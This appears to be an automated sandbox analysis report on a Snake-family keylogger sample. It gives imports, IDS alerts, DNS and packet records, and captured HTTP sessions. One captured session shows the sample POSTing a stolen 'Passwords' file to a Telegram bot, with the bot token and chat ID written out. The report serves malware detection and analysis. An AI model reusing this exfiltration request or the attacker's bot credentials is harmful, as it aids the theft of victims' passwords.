                                                                        RT_GROUP_ICON0x10f4ec0x14dataEnglishGreat Britain1.25
                                                                        RT_VERSION0x10f5000xdcdataEnglishGreat Britain0.6181818181818182
                                                                        RT_MANIFEST0x10f5dc0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                        Imports

                                                                        DLLImport
                                                                        WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                        VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                        COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                        MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                        WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                        PSAPI.DLLGetProcessMemoryInfo
                                                                        IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                        USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                        UxTheme.dllIsThemeActive
                                                                        KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                        USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                        GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                        COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                        ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                        OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishGreat Britain

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2025-01-11T02:55:22.058287+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730158.101.44.24280TCP
                                                                        2025-01-11T02:55:28.308297+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730158.101.44.24280TCP
                                                                        2025-01-11T02:55:29.019529+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449732149.154.167.220443TCP
                                                                        2025-01-11T02:55:29.319000+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449732149.154.167.220443TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Jan 11, 2025 02:55:21.245430946 CET4973080192.168.2.4158.101.44.242
                                                                        Jan 11, 2025 02:55:21.250965118 CET8049730158.101.44.242192.168.2.4
                                                                        Jan 11, 2025 02:55:21.251049995 CET4973080192.168.2.4158.101.44.242
                                                                        Jan 11, 2025 02:55:21.251450062 CET4973080192.168.2.4158.101.44.242
                                                                        Jan 11, 2025 02:55:21.256311893 CET8049730158.101.44.242192.168.2.4
                                                                        Jan 11, 2025 02:55:21.838393927 CET8049730158.101.44.242192.168.2.4
                                                                        Jan 11, 2025 02:55:21.845527887 CET4973080192.168.2.4158.101.44.242
                                                                        Jan 11, 2025 02:55:21.853532076 CET8049730158.101.44.242192.168.2.4
                                                                        Jan 11, 2025 02:55:22.010802984 CET8049730158.101.44.242192.168.2.4
                                                                        Jan 11, 2025 02:55:22.058286905 CET4973080192.168.2.4158.101.44.242
                                                                        Jan 11, 2025 02:55:22.061815977 CET49731443192.168.2.4104.21.16.1
                                                                        Jan 11, 2025 02:55:22.061853886 CET44349731104.21.16.1192.168.2.4
                                                                        Jan 11, 2025 02:55:22.062279940 CET49731443192.168.2.4104.21.16.1
                                                                        Jan 11, 2025 02:55:22.080682993 CET49731443192.168.2.4104.21.16.1
                                                                        Jan 11, 2025 02:55:22.080708027 CET44349731104.21.16.1192.168.2.4
                                                                        Jan 11, 2025 02:55:22.561337948 CET44349731104.21.16.1192.168.2.4
                                                                        Jan 11, 2025 02:55:22.563344002 CET49731443192.168.2.4104.21.16.1
                                                                        Jan 11, 2025 02:55:22.568805933 CET49731443192.168.2.4104.21.16.1
                                                                        Jan 11, 2025 02:55:22.568825960 CET44349731104.21.16.1192.168.2.4
                                                                        Jan 11, 2025 02:55:22.569102049 CET44349731104.21.16.1192.168.2.4
                                                                        Jan 11, 2025 02:55:22.623378992 CET49731443192.168.2.4104.21.16.1
                                                                        Jan 11, 2025 02:55:22.643347979 CET49731443192.168.2.4104.21.16.1
                                                                        Jan 11, 2025 02:55:22.687334061 CET44349731104.21.16.1192.168.2.4
                                                                        Jan 11, 2025 02:55:22.762450933 CET44349731104.21.16.1192.168.2.4
                                                                        Jan 11, 2025 02:55:22.762590885 CET44349731104.21.16.1192.168.2.4
                                                                        Jan 11, 2025 02:55:22.762667894 CET49731443192.168.2.4104.21.16.1
                                                                        Jan 11, 2025 02:55:22.774936914 CET49731443192.168.2.4104.21.16.1
                                                                        Jan 11, 2025 02:55:28.092679977 CET4973080192.168.2.4158.101.44.242
                                                                        Jan 11, 2025 02:55:28.097795010 CET8049730158.101.44.242192.168.2.4
                                                                        Jan 11, 2025 02:55:28.256834030 CET8049730158.101.44.242192.168.2.4
                                                                        Jan 11, 2025 02:55:28.284524918 CET49732443192.168.2.4149.154.167.220
                                                                        Jan 11, 2025 02:55:28.284636974 CET44349732149.154.167.220192.168.2.4
                                                                        Jan 11, 2025 02:55:28.284723997 CET49732443192.168.2.4149.154.167.220
                                                                        Jan 11, 2025 02:55:28.285429955 CET49732443192.168.2.4149.154.167.220
                                                                        Jan 11, 2025 02:55:28.285481930 CET44349732149.154.167.220192.168.2.4
                                                                        Jan 11, 2025 02:55:28.308296919 CET4973080192.168.2.4158.101.44.242
                                                                        Jan 11, 2025 02:55:28.893898964 CET44349732149.154.167.220192.168.2.4
                                                                        Jan 11, 2025 02:55:28.894020081 CET49732443192.168.2.4149.154.167.220
                                                                        Jan 11, 2025 02:55:28.975327015 CET49732443192.168.2.4149.154.167.220
                                                                        Jan 11, 2025 02:55:28.975373030 CET44349732149.154.167.220192.168.2.4
                                                                        Jan 11, 2025 02:55:28.975717068 CET44349732149.154.167.220192.168.2.4
                                                                        Jan 11, 2025 02:55:28.978960991 CET49732443192.168.2.4149.154.167.220
                                                                        Jan 11, 2025 02:55:29.019334078 CET44349732149.154.167.220192.168.2.4
                                                                        Jan 11, 2025 02:55:29.019428968 CET49732443192.168.2.4149.154.167.220
                                                                        Jan 11, 2025 02:55:29.019440889 CET44349732149.154.167.220192.168.2.4
                                                                        Jan 11, 2025 02:55:29.318991899 CET44349732149.154.167.220192.168.2.4
                                                                        Jan 11, 2025 02:55:29.319122076 CET44349732149.154.167.220192.168.2.4
                                                                        Jan 11, 2025 02:55:29.319186926 CET49732443192.168.2.4149.154.167.220
                                                                        Jan 11, 2025 02:55:29.319730043 CET49732443192.168.2.4149.154.167.220
                                                                        Jan 11, 2025 02:55:38.300396919 CET6309953192.168.2.41.1.1.1
                                                                        Jan 11, 2025 02:55:38.305330038 CET53630991.1.1.1192.168.2.4
                                                                        Jan 11, 2025 02:55:38.305469036 CET6309953192.168.2.41.1.1.1
                                                                        Jan 11, 2025 02:55:38.310422897 CET53630991.1.1.1192.168.2.4
                                                                        Jan 11, 2025 02:55:38.773258924 CET6309953192.168.2.41.1.1.1
                                                                        Jan 11, 2025 02:55:38.778470039 CET53630991.1.1.1192.168.2.4
                                                                        Jan 11, 2025 02:55:38.780309916 CET6309953192.168.2.41.1.1.1
                                                                        Jan 11, 2025 02:56:33.257327080 CET8049730158.101.44.242192.168.2.4
                                                                        Jan 11, 2025 02:56:33.257488012 CET4973080192.168.2.4158.101.44.242
                                                                        Jan 11, 2025 02:57:02.781749010 CET4973080192.168.2.4158.101.44.242
                                                                        Jan 11, 2025 02:57:02.786695957 CET8049730158.101.44.242192.168.2.4

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Jan 11, 2025 02:55:21.231412888 CET5408053192.168.2.41.1.1.1
                                                                        Jan 11, 2025 02:55:21.238620043 CET53540801.1.1.1192.168.2.4
                                                                        Jan 11, 2025 02:55:22.053776026 CET5023953192.168.2.41.1.1.1
                                                                        Jan 11, 2025 02:55:22.060830116 CET53502391.1.1.1192.168.2.4
                                                                        Jan 11, 2025 02:55:28.276932955 CET6173753192.168.2.41.1.1.1
                                                                        Jan 11, 2025 02:55:28.283859968 CET53617371.1.1.1192.168.2.4
                                                                        Jan 11, 2025 02:55:38.299827099 CET53651781.1.1.1192.168.2.4

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Jan 11, 2025 02:55:21.231412888 CET192.168.2.41.1.1.10xc571Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                        Jan 11, 2025 02:55:22.053776026 CET192.168.2.41.1.1.10xc5ffStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                        Jan 11, 2025 02:55:28.276932955 CET192.168.2.41.1.1.10x38aaStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Jan 11, 2025 02:55:21.238620043 CET1.1.1.1192.168.2.40xc571No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                        Jan 11, 2025 02:55:21.238620043 CET1.1.1.1192.168.2.40xc571No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                        Jan 11, 2025 02:55:21.238620043 CET1.1.1.1192.168.2.40xc571No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                        Jan 11, 2025 02:55:21.238620043 CET1.1.1.1192.168.2.40xc571No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                        Jan 11, 2025 02:55:21.238620043 CET1.1.1.1192.168.2.40xc571No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                        Jan 11, 2025 02:55:21.238620043 CET1.1.1.1192.168.2.40xc571No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                        Jan 11, 2025 02:55:22.060830116 CET1.1.1.1192.168.2.40xc5ffNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                        Jan 11, 2025 02:55:22.060830116 CET1.1.1.1192.168.2.40xc5ffNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                        Jan 11, 2025 02:55:22.060830116 CET1.1.1.1192.168.2.40xc5ffNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                        Jan 11, 2025 02:55:22.060830116 CET1.1.1.1192.168.2.40xc5ffNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                        Jan 11, 2025 02:55:22.060830116 CET1.1.1.1192.168.2.40xc5ffNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                        Jan 11, 2025 02:55:22.060830116 CET1.1.1.1192.168.2.40xc5ffNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                        Jan 11, 2025 02:55:22.060830116 CET1.1.1.1192.168.2.40xc5ffNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                        Jan 11, 2025 02:55:28.283859968 CET1.1.1.1192.168.2.40x38aaNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • reallyfreegeoip.org
                                                                        • api.telegram.org
                                                                        • checkip.dyndns.org

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.449730158.101.44.242807300C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Jan 11, 2025 02:55:21.251450062 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Jan 11, 2025 02:55:21.838393927 CET321INHTTP/1.1 200 OK
                                                                        Date: Sat, 11 Jan 2025 01:55:21 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 18b8594d608565420c5a26c97e7f2389
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                        Jan 11, 2025 02:55:21.845527887 CET127OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Jan 11, 2025 02:55:22.010802984 CET321INHTTP/1.1 200 OK
                                                                        Date: Sat, 11 Jan 2025 01:55:21 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: f111f1e6300f9a0cab5c573355ee4c3c
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                        Jan 11, 2025 02:55:28.092679977 CET127OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Jan 11, 2025 02:55:28.256834030 CET321INHTTP/1.1 200 OK
                                                                        Date: Sat, 11 Jan 2025 01:55:28 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 8f9463d0211db1a09ab4bb5453eab3da
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.449731104.21.16.14437300C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-11 01:55:22 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        Connection: Keep-Alive
                                                                        2025-01-11 01:55:22 UTC859INHTTP/1.1 200 OK
                                                                        Date: Sat, 11 Jan 2025 01:55:22 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 362
                                                                        Connection: close
                                                                        Age: 1875311
                                                                        Cache-Control: max-age=31536000
                                                                        cf-cache-status: HIT
                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mHE3W%2BYS%2BECOkWY2yJlBn4jlYzHdpyUSDDwZYi%2FOG91dHidmQ8DOIKBg45FezA2vFcreepTDODmKMWISEiQ8krU%2Bwk0FGDEOyATFbH%2FP0qRQRseGlLvUQmasI8aYZ8z5iDVhjnKN"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 900148c2da2c8ce0-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1827&min_rtt=1823&rtt_var=692&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1571582&cwnd=215&unsent_bytes=0&cid=a94e271254624fd9&ts=211&x=0"
                                                                        2025-01-11 01:55:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.449732149.154.167.2204437300C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-11 01:55:28 UTC295OUTPOST /bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendDocument?chat_id=1437092720&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary================8dd31b91c731df5
                                                                        Host: api.telegram.org
                                                                        Content-Length: 1090
                                                                        Connection: Keep-Alive
                                                                        2025-01-11 01:55:29 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 62 39 31 63 37 33 31 64 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
